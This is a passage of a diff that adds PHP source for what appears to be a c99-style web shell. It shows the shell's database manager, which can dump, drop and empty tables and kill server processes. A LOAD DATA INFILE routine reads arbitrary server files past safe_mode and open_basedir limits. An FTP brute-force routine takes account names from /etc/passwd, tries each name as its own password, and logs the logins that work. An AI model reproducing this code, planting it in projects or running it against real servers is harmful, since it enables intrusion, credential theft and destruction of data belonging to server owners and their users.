+      elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+      elseif ($sql_tbl_act == "insert") {
+        if ($sql_tbl_insert_radio == 1) {
+          $keys = "";
+          $akeys = array_keys($sql_tbl_insert);
+          foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+          if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+          $values = "";
+          $i = 0;
+          foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+          if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+          $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+          $sql_act = "query";
+          $sql_tbl_act = "browse";
+        }
+        elseif ($sql_tbl_insert_radio == 2) {
+          $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+          $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+          $result = mysql_query($sql_query) or print(mysql_smarterror());
+          $result = mysql_fetch_array($result, MYSQL_ASSOC);
+          $sql_act = "query";
+          $sql_tbl_act = "browse";
+        }
+      }
+      if ($sql_act == "query") {
+        echo "<hr size=\"1\" noshade>";
+        if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+        if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+        if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+      }
+      if (in_array($sql_act,$acts)) {
+        ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b>
+        <form action="<?php echo $surl; ?>">
+        <input type="hidden" name="act" value="sql">
+        <input type="hidden" name="sql_act" value="newtbl">
+        <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
+        <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
+        <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
+        <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
+        <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
+        <input type="text" name="sql_newtbl" size="20">
+        <input type="submit" value="Create">
+        </form></td>
+        <td width="30%" height="1"><b>Dump DB:</b>
+        <form action="<?php echo $surl; ?>">
+        <input type="hidden" name="act" value="sql">
+        <input type="hidden" name="sql_act" value="dump">
+        <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
+        <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
+        <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
+        <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"><input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table>
+        <?php
+        if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+        if ($sql_act == "newtbl") {
+          echo "<b>";
+          if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
+            echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+          }
+          else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+        }
+        elseif ($sql_act == "dump") {
+          if (empty($submit)) {
+            $diplay = FALSE;
+            echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+            echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+            $v = join (";",$dmptbls);
+            echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+            if ($dump_file) {$tmp = $dump_file;}
+            else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+            echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+            echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+            echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+            echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+            echo "</form>";
+          }
+          else {
+            $diplay = TRUE;
+            $set = array();
+            $set["sock"] = $sql_sock;
+            $set["db"] = $sql_db;
+            $dump_out = "download";
+            $set["print"] = 0;
+            $set["nl2br"] = 0;
+            $set[""] = 0;
+            $set["file"] = $dump_file;
+            $set["add_drop"] = TRUE;
+            $set["onlytabs"] = array();
+            if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+            $ret = mysql_dump($set);
+            if ($sql_dump_download) {
+              @ob_clean();
+              header("Content-type: application/octet-stream");
+              header("Content-length: ".strlen($ret));
+              header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+              echo $ret;
+              exit;
+            }
+            elseif ($sql_dump_savetofile) {
+              $fp = fopen($sql_dump_file,"w");
+              if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+              else {
+                fwrite($fp,$ret);
+                fclose($fp);
+                echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+              }
+            }
+            else {echo "<b>Dump: nothing to do!</b>";}
+          }
+        }
+        if ($diplay) {
+    if (!empty($sql_tbl)) {
+      if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+      $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+      $count_row = mysql_fetch_array($count);
+      mysql_free_result($count);
+      $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+      $tbl_struct_fields = array();
+      while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+      if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+      if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+      if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+      if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+      $perpage = $sql_tbl_le - $sql_tbl_ls;
+      if (!is_numeric($perpage)) {$perpage = 10;}
+      $numpages = $count_row[0]/$perpage;
+      $e = explode(" ",$sql_order);
+      if (count($e) == 2) {
+        if ($e[0] == "d") {$asc_desc = "DESC";}
+        else {$asc_desc = "ASC";}
+        $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+      }
+      else {$v = "";}
+      $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+      $result = mysql_query($query) or print(mysql_smarterror());
+      echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[<b> Structure </b>]</a>&nbsp;&nbsp;&nbsp;";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[<b> Browse </b>]</a>&nbsp;&nbsp;&nbsp;";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[<b> Dump </b>]</a>&nbsp;&nbsp;&nbsp;";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+      if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+      if ($sql_tbl_act == "insert") {
+        if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+        if (!empty($sql_tbl_insert_radio)) {  } //Not Ready
+        else {
+          echo "<br><br><b>Inserting row into table:</b><br>";
+          if (!empty($sql_tbl_insert_q)) {
+            $sql_query = "SELECT * FROM `".$sql_tbl."`";
+            $sql_query .= " WHERE".$sql_tbl_insert_q;
+            $sql_query .= " LIMIT 1;";
+            $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+            $values = mysql_fetch_assoc($result);
+            mysql_free_result($result);
+          }
+          else {$values = array();}
+          echo "<form method=\"POST\"><table width=\"1%\" border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+          foreach ($tbl_struct_fields as $field) {
+            $name = $field["Field"];
+            if (empty($sql_tbl_insert_q)) {$v = "";}
+            echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+            $i++;
+          }
+          echo "</table><br>";
+          echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+          if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+          echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+        }
+      }
+      if ($sql_tbl_act == "browse") {
+        $sql_tbl_ls = abs($sql_tbl_ls);
+        $sql_tbl_le = abs($sql_tbl_le);
+        echo "<hr size=\"1\" noshade>";
+        echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
+        $b = 0;
+        for($i=0;$i<$numpages;$i++) {
+          if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+          echo $i;
+          if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+          if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+          else {echo "&nbsp;";}
+        }
+        if ($i == 0) {echo "empty";}
+        echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+        echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>";
+        echo "<tr>";
+        echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+        for ($i=0;$i<mysql_num_fields($result);$i++) {
+          $v = mysql_field_name($result,$i);
+          if ($e[0] == "a") {$s = "d"; $m = "asc";}
+          else {$s = "a"; $m = "desc";}
+          echo "<td>";
+          if (empty($e[0])) {$e[0] = "a";}
+          if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+          else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
+          echo "</td>";
+        }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>+</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act)) {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb") {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus") {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars") {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes") {
+     if (!empty($kill)) {
+       $query = "KILL ".$kill.";";
+       $result = mysql_query($query, $sql_sock);
+       echo "<b>Process #".$kill." was killed.</b>";
+     }
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb);
+    }
+   }
+  }
+}
+echo "</td></tr></table>\n";
+if ($sql_sock) {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows : ".$affected."</center></td></tr>";
+}
+echo "</table>\n";
+}
+//End of SQL Manager
+if ($act == "ftpquickbrute") {
+echo "<center><table><tr><td class=barheader colspan=2>";
+echo ".: Ftp Quick Brute :.</td></tr>";
+echo "<tr><td>";
+if ($win) { echo "Can't run on Windows!"; }
+else {
+  function dQ99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) {
+    if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+    else {$TRUE = TRUE;}
+    if ($TRUE) {
+      $sock = @ftp_connect($host,$port,$timeout);
+      if (@ftp_login($sock,$login,$pass)) {
+        echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+        ob_flush();
+        return TRUE;
+      }
+    }
+  }
+  if (!empty($submit)) {
+    if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+    $fp = fopen("/etc/passwd","r");
+    if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+    else {
+      if ($fqb_logging) {
+        if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+        else {$fqb_logfp = FALSE;}
+        $fqb_log = "FTP Quick Brute (".$sh_name.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+        if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      }
+      ob_flush();
+      $i = $success = 0;
+      $ftpquick_st = getmicrotime();
+      while(!feof($fp)) {
+        $str = explode(":",fgets($fp,2048));
+        if (dQ99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) {
+          echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+          $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+          if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+          $success++;
+          ob_flush();
+        }
+        if ($i > $fqb_lenght) {break;}
+        $i++;
+      }
+      if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+      $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+      echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
